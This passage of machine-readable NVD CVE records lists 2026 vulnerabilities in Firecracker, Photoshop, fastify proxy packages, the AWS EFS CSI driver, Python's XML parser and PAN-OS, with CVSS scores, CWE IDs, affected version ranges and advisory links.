NED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":0.8,"impactScore":6.0}]},"weaknesses":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","description":[{"lang":"en","value":"CWE-369"},{"lang":"en","value":"CWE-787"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:amazon:firecracker:*:*:*:*:*:*:*:*","versionStartIncluding":"1.13.0","versionEndIncluding":"1.14.3","matchCriteriaId":"4662887D-1027-4734-9918-3E477F871CC8"},{"vulnerable":true,"criteria":"cpe:2.3:a:amazon:firecracker:1.15.0:-:*:*:*:*:*:*","matchCriteriaId":"B5F6B773-4741-4E73-9DFD-9AA3F640A224"},{"vulnerable":true,"criteria":"cpe:2.3:a:amazon:firecracker:1.15.0:dev:*:*:*:*:*:*","matchCriteriaId":"D90FD91D-C30F-40F4-8138-9D1A3EA496D9"}]}]}],"references":[{"url":"https://aws.amazon.com/security/security-bulletins/2026-015-aws/","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Vendor Advisory"]},{"url":"https://github.com/firecracker-microvm/firecracker/releases/tag/v1.14.4","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Release Notes"]},{"url":"https://github.com/firecracker-microvm/firecracker/releases/tag/v1.15.1","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Release Notes"]},{"url":"https://github.com/firecracker-microvm/firecracker/security/advisories/GHSA-776c-mpj7-jm3r","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-27289","sourceIdentifier":"psirt@adobe.com","published":"2026-04-14T20:16:34.140","lastModified":"2026-06-01T14:40:35.277","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Photoshop Desktop versions 27.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Primary","description":[{"lang":"en","value":"CWE-125"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:photoshop:*:*:*:*:*:*:*:*","versionStartIncluding":"27.0","versionEndExcluding":"27.5","matchCriteriaId":"A030FA03-9A83-4835-98FB-F5542BB4B02A"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/photoshop/apsb26-40.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-33805","sourceIdentifier":"ce714d77-add3-4f53-aff5-83d477b104bb","published":"2026-04-15T11:16:34.990","lastModified":"2026-06-01T14:51:29.517","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"@fastify/reply-from v12.6.1 and earlier and @fastify/http-proxy v11.4.3 and earlier process the client's Connection header after the proxy has added its own headers via rewriteRequestHeaders. This allows attackers to retroactively strip proxy-added headers from upstream requests by listing them in the Connection header value. Any header added by the proxy for routing, access control, or security purposes can be selectively removed by a client. @fastify/http-proxy is also affected as it delegates to @fastify/reply-from. \n\nUpgrade to @fastify/reply-from v12.6.2 or @fastify/http-proxy v11.4.4 or later."}],"metrics":{"cvssMetricV40":[{"source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":9.0,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":4.0}]},"weaknesses":[{"source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary","description":[{"lang":"en","value":"CWE-644"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:fastify:fastify\\/http-proxy:*:*:*:*:*:node.js:*:*","versionEndExcluding":"11.4.4","matchCriteriaId":"E2043F2B-59EB-40CE-9B6D-F8AD357DD033"},{"vulnerable":true,"criteria":"cpe:2.3:a:fastify:reply-from:*:*:*:*:*:node.js:*:*","versionEndExcluding":"12.6.2","matchCriteriaId":"2EC6D95F-10D0-4E74-AF35-62CF6F597A50"}]}]}],"references":[{"url":"https://cna.openjsf.org/security-advisories.html","source":"ce714d77-add3-4f53-aff5-83d477b104bb","tags":["Vendor Advisory"]},{"url":"https://github.com/fastify/fastify-reply-from/security/advisories/GHSA-gwhp-pf74-vj37","source":"ce714d77-add3-4f53-aff5-83d477b104bb","tags":["Exploit","Mitigation","Vendor Advisory"]},{"url":"https://github.com/fastify/fastify-reply-from/security/advisories/GHSA-gwhp-pf74-vj37","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Mitigation","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-6437","sourceIdentifier":"ff89ba41-3aa1-4d27-914a-91399e9639e5","published":"2026-04-17T19:16:40.150","lastModified":"2026-06-01T13:06:25.717","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Improper neutralization of argument delimiters in the volume handling component in AWS EFS CSI Driver (aws-efs-csi-driver) before v3.0.1 allows remote authenticated users with PersistentVolume creation permissions to inject arbitrary mount options via comma injection.\n\n\n\n\nTo remediate this issue, users should upgrade to version v3.0.1"}],"metrics":{"cvssMetricV40":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:H/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"HIGH","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":5.2}]},"weaknesses":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","description":[{"lang":"en","value":"CWE-88"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:amazon:efs_csi_driver:*:*:*:*:*:kubernetes:*:*","versionEndExcluding":"3.0.1","matchCriteriaId":"6A6EA44D-2ECD-4CD5-91AD-2437511A009B"}]}]}],"references":[{"url":"https://aws.amazon.com/security/security-bulletins/2026-016-aws/","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Vendor Advisory"]},{"url":"https://github.com/kubernetes-sigs/aws-efs-csi-driver/releases/tag/v3.0.1","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Release Notes"]},{"url":"https://github.com/kubernetes-sigs/aws-efs-csi-driver/security/advisories/GHSA-mph4-q2vm-w2pw","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-7210","sourceIdentifier":"cna@python.org","published":"2026-05-11T18:16:42.413","lastModified":"2026-06-01T14:32:20.657","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"`xml.parsers.expat` and `xml.etree.ElementTree` use insufficient entropy for Expat hash-flooding protection, which allows a crafted XML document to trigger hash flooding.\\r\\n\\r\\nFully mitigating this vulnerability requires both updating libexpat to 2.8.0 or later and applying this patch."}],"metrics":{"cvssMetricV40":[{"source":"cna@python.org","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"cna@python.org","type":"Secondary","description":[{"lang":"en","value":"CWE-331"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:python:python:*:*:*:*:*:*:*:*","versionEndExcluding":"3.15.0","matchCriteriaId":"43B0671A-35BB-4EE4-8A68-E79B62A75547"}]}]}],"references":[{"url":"https://github.com/python/cpython/issues/149018","source":"cna@python.org","tags":["Issue Tracking"]},{"url":"https://github.com/python/cpython/pull/149023","source":"cna@python.org","tags":["Issue Tracking","Patch"]},{"url":"https://mail.python.org/archives/list/security-announce@python.org/thread/PNY5OMBDPM2FRUZTWFFPJ6LISWKV627K/","source":"cna@python.org","tags":["Mailing List","Third Party Advisory"]},{"url":"http://www.openwall.com/lists/oss-security/2026/05/11/13","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]},{"url":"http://www.openwall.com/lists/oss-security/2026/05/11/8","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2026-0257","sourceIdentifier":"psirt@paloaltonetworks.com","published":"2026-05-13T19:17:01.040","lastModified":"2026-06-01T12:33:52.710","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Authentication bypass vulnerabilities in the GlobalProtect portal and gateway of Palo Alto Networks PAN-OS® software allows the attacker to bypass security restrictions and establish an unauthorized VPN connection.\n\nPanorama and Cloud NGFW are not impacted by these issues."}],"metrics":{"cvssMetricV40":[{"source":"psirt@paloaltonetworks.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:A/V:D/RE:M/U:Red","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"ATTACKED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NO","Recovery":"AUTOMATIC","valueDensity":"DIFFUSE","vulnerabilityResponseEffort":"MODERATE","providerUrgency":"RED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","baseScore":9.1,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":5.2}]},"cisaExploitAdd":"2026-05-29","cisaActionDue":"2026-06-01","cisaRequiredAction":"Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.","cisaVulnerabilityName":"Palo Alto Networks PAN-OS Authentication Bypass Vulnerability","weaknesses":[{"source":"psirt@paloaltonetworks.com","type":"Secondary","description":[{"lang":"en","value":"CWE-565"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*","versionEndExcluding":"10.2.7","matchCriteriaId":"57F7F91D-1366-42D9-B106-B200D38D8A38"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:-:*:*:*:*:*:*","matchCriteriaId":"A8C42D98-CF8F-456B-9D57-80BBDC2C8E74"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h1:*:*:*:*:*:*","matchCriteriaId":"B3AAD4BA-22DD-43D3-91F1-8A6F5FBBF029"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h12:*:*:*:*:*:*","matchCriteriaId":"AA4994CB-6591-4B44-A5D7-3CDF540B97DE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h16:*:*:*:*:*:*","matchCriteriaId":"A6AB7874-FE24-42AC-8E3A-822A70722126"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h18:*:*:*:*:*:*","matchCriteriaId":"34B083B9-CC1B-43CD-9A16-C018F7FA2DDB"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h19:*:*:*:*:*:*","matchCriteriaId":"0D88CC33-7E32-4E82-8A94-70759E910510"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h21:*:*:*:*:*:*","matchCriteriaId":"FA91A4E9-CE1E-4CB8-B717-4B0E314C0171"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h24:*:*:*:*:*:*","matchCriteriaId":"28994519-3519-4E94-8D8B-7C4251A82B8B"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h3:*:*:*:*:*:*","matchCriteriaId":"776E06EC-2FDA-4664-AB43-9F6BE9B897CA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h32:*:*:*:*:*:*","matchCriteriaId":"53981EA8-847F-4FBC-BA55-8EDF591E0FF8"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h6:*:*:*:*:*:*","matchCriteriaId":"CBE09375-A863-42FF-813F-C20679D7C45C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h8:*:*:*:*:*:*","matchCriteriaId":"1311961A-0EF6-488E-B0C2-EDBD508587C9"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:*:*:*:*:*:*:*","matchCriteriaId":"78EAA309-2755-4ED2-9AFC-F4D9DF8F90D3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:*:*:*:*:*:*:*","matchCriteriaId":"5D6D42C2-1CEC-47D2-82B2-1EFE71A8C8A3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:-:*:*:*:*:*:*","matchCriteriaId":"03C5ABF2-8C53-4376-8A64-6CB34E18E77C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h10:*:*:*:*:*:*","matchCriteriaId":"FF7FCD8B-80DF-4004-A9D2-4EE884F089A6"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h12:*:*:*:*:*:*","matchCriteriaId":"83C9637A-B615-4CC2-84AA-BDCFE611484C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h14:*:*:*:*:*:*","matchCriteriaId":"224270A7-767D-433B-AD51-C031506747C1"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h17:*:*:*:*:*:*","matchCriteriaId":"A532EFC6-A883-4279-8C05-9CD600B3F963"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h18:*:*:*:*:*:*","matchCriteriaId":"F4F20C02-DF90-4609-9254-B765481C83E0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h2:*:*:*:*:*:*","matchCriteriaId":"872BC747-512A-4872-AC86-E7F1DC589F47"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h21:*:*:*:*:*:*","matchCriteriaId":"E5E36C87-E01D-49DC-AB73-10E5EE27F596"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h27:*:*:*:*:*:*","matchCriteriaId":"39437442-B24D-492F-B637-2203492327FC"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h3:*:*:*:*:*:*","matchCriteriaId":"67F527D0-F85B-4B83-AEA5-BA636FC89210"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h30:*:*:*:*:*:*","matchCriteriaId":"984BE1FB-ADB7-4831-AEDD-39DBAED078B0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h31:*:*:*:*:*:*","matchCriteriaId":"AF2C954D-9763-41E3-A132-F83C82E79BC0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h4:*:*:*:*:*:*","matchCriteriaId":"6CF8F985-7E51-49E6-857A-FAAF027F5611"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h5:*:*:*:*:*:*","matchCriteriaId":"B437DCEA-ABA3-41CA-B320-97EC430F1122"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h7:*:*:*:*:*:*","matchCriteriaId":"593AFE7A-CB37-4156-A2B8-646A317F3176"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h9:*:*:*:*:*:*","matchCriteriaId":"A9F032C2-3202-479B-8C70-277F6871A4A4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.11:*:*:*:*:*:*:*","matchCriteriaId":"3079F29C-688B-4FFB-BBC0-5FCD7B5B6905"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.12:*:*:*:*:*:*:*","matchCriteriaId":"674C85C5-162E-42DE-ACD1-D18943040E1C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:-:*:*:*:*:*:*","matchCriteriaId":"C2B871A6-0636-42A0-9573-6F693D7753AD"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h1:*:*:*:*:*:*","matchCriteriaId":"F1FC63B8-B8D9-4EC1-85CA-2E12B38ACD3E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h10:*:*:*:*:*:*","matchCriteriaId":"F3F8462A-71C0-4F81-9882-C73BC90697CA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h16:*:*:*:*:*:*","matchCriteriaId":"C1B72E68-2D01-483F-BEC5-59C49E96B976"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h18:*:*:*:*:*:*","matchCriteriaId":"E49419C4-9AFE-4B7F-90EF-DB50EBB608D3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h2:*:*:*:*:*:*","matchCriteriaId":"60CE628F-C4CB-4342-8D71-DE61A089B612"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h3:*:*:*:*:*:*","matchCriteriaId":"2447D2B1-A145-4036-B9F2-17648B193465"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h4:*:*:*:*:*:*","matchCriteriaId":"C24353AF-DC81-49B9-9132-9EEC8E6009BB"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h5:*:*:*:*:*:*","matchCriteriaId":"B4420489-AE0F-4A48-B2CE-C165BEBFA6A2"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h7:*:*:*:*:*:*","matchCriteriaId":"C45D8DF1-9483-4B24-AB94-B1FF4A5F2606"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.14:*:*:*:*:*:*:*","matchCriteriaId":"941CB947-862C-4C17-A039-8CD46D21B3BA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.15:*:*:*:*:*:*:*","matchCriteriaId":"146BFB2E-5802-495E-B20D-9783B41357A2"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.16:-:*:*:*:*:*:*","matchCriteriaId":"BC38A9CD-CDB6-423A-BE8D-2E0E45A3B239"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.16:h1:*:*:*:*:*:*","matchCriteriaId":"41B48ECA-FD05-4EA2-B1C9-771624EAAFF4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.16:h4:*:*:*:*:*:*","matchCriteriaId":"4D65D1F0-323E-41AF-962E-1F9741748A76"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.16:h6:*:*:*:*:*:*","matchCriteriaId":"D5D41E00-D517-4B81-A7FC-C8E101884807"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.17:*:*:*:*:*:*:*","matchCriteriaId":"8A30968E-901A-49AE-94B0-C44A5257AADB"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.18:-:*:*:*:*:*:*","matchCriteriaId":"19604659-570D-4766-B8B5-8B9920E2607F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.18:h1:*:*:*:*:*:*","matchCriteriaId":"745A3A2A-73CF-4DC2-968B-ACFC66389E11"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.18:h5:*:*:*:*:*:*","matchCriteriaId":"3A1E533E-DE4A-4F2F-A71A-FFF56E757087"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.